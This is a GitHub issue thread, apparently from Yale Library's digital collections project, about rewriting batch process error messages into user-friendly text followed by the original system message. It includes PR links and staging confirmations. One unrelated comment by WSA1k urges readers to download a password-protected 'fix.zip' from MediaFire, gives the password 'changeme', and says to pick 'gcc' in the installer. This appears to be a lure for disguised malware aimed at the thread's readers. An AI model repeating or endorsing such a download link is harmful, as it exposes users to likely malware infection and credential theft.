### ISSUE TITLE
Update batch process error messages - round 1

### ISSUE THREAD

**Issue by sshetenhelm** [yalelibrary/YUL-DC#2924]
**Story**
When batch processes encounter errors, the messages that appear do not always provide clarity on the actual reason for the error. We would like to update messages to provide (a) a better representation of the error and (b) actionable next-steps for processes initiated by Management users.

This ticket is for updating the language on the coding end. Error message gathering and new language creation was addressed in ticket #2882.

Additional needed updates may be forthcoming in a separate ticket (#2952)

**For the messages -** 
We would like to display a more user friendly message first, and then follow with the original error message as produced by Management. This way, users will have an idea of what is happening, and DCS team members will have the valuable information (such as specific Preservica URIs, etc.) provided by the error without having to download spreadsheets every time they want to investigate. 

**For example:** 
```
The admin set code is missing or incorrect. Please ensure an admin_set value is in the correct spreadsheet column and that your 3 or 4 letter code is correct.

Message from system - 
Skipping row [3] with unknown admin set [] for parent:
```

Please use the language provided in column D of this spreadsheet: [DCS_ErrorMessageUpdates.xlsx](https://github.com/user-attachments/files/17364592/DCS_ErrorMessageUpdates.xlsx)

If the proposed formatting won't work for any reason, we are open to your suggestions.

**Acceptance**

Update batch process code to display new messages for batch process errors

- [x] Unknown admin set
- [x] Undefined method for nil:NilClass
- [x] SetupMetadataJob failed to retrieve authoritative metadata. 
- [x] Skipping row [2] bad URI(is not URI?):
- [x] Request error 404 <?xml version="1.0" encoding="UTF-8" standalone="yes"?><Error><ExtendedMessage>The entity of type SO : c434837-25d9-4cf6-82e0-c7d4b7bea2e does not exist in the database
- [x] Checksum mismatch
- [x] Expected child file not found

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jpengst** [comment]
Do we know which job/process the `Skipping row [2] bad URI(is not URI?):` error is coming from?

**Comment by sshetenhelm** [comment]
It showed up in a [Create Parent Objects batch process](https://collections.library.yale.edu/management/batch_processes/16296) when a staff member put in a Preservica URI that had a spacing issue (there was a line break between `/structural-objects/` and the Preservica UUID in the cell).

**Comment by jpengst** [comment]
PR: https://github.com/yalelibrary/yul-dc-management/pull/1451

**Comment by K8Sewell** [comment]
Deployed to Test with release [v2.72.5](https://github.com/yalelibrary/yul-dc-management/releases/tag/v2.72.5)

**Comment by K8Sewell** [comment]
Looking mostly good on Test.  Unsure if all are as they are expected - please see below.  Because Preservica's Test instance is only connected to UAT I will promote this to there so that preservica objects can be evaluated better.

no admin set
![Image](https://github.com/user-attachments/assets/0e6dfa6d-2571-47dd-8ee8-88fbc29516d6)

bad uri
![Image](https://github.com/user-attachments/assets/4875ab56-7e39-49e8-8741-e93a25d5dc2d)

request error 404 - SO not found in db
Q: should the message also include 'The given URI does not match the URI of an entity of this type in Preservica. Please make sure your Preservica URI and object structure type is correct.' ?  The system message matches but was unsure if it should expect the user friendly text as well in the message box.
![Image](https://github.com/user-attachments/assets/ea31b3ed-90ef-42b8-9cb8-c2ec684d98bf)

**Comment by sshetenhelm** [comment]
So for these, if possible, I was hoping to have both the user friendly text displayed and the system displayed. So, it would look like this: 

_The admin set code is missing or incorrect. Please ensure an admin_set value is in the correct spreadsheet column and that your 3 or 4 letter code is correct.

Message from system - 
Skipping row [3] with unknown admin set [] for parent:_

The system message gives useful information that Lauren and I can use to help troubleshoot without having to look elsewhere, while the user friendly part is to empower staff to figure it out themselves. If they can't, that's where the system message would come in handy for Lauren and I.

Is it possible to include both messages in the Note cell for all of these?

**Comment by jpengst** [comment]
Ah! Yeah, we can definitely do that :)
I'll get a PR up for that today

**Comment by jpengst** [comment]
<img width="1444" alt="image" src="https://github.com/user-attachments/assets/8d91bd65-cc88-40d1-8006-1dd41a0f0871">

**Comment by jpengst** [comment]
PR: https://github.com/yalelibrary/yul-dc-management/pull/1452

**Comment by K8Sewell** [comment]
Looking good on Test.  Will promote to UAT.

no admin set
![Image](https://github.com/user-attachments/assets/8d61d873-5b70-45d0-92f2-207a5f704f86)


bad uri
![Image](https://github.com/user-attachments/assets/82e3e653-b2bd-4997-bb06-08799c2b0783)

**Comment by sshetenhelm** [comment]
Looking good in UAT! Thank you!

Ready to close :)
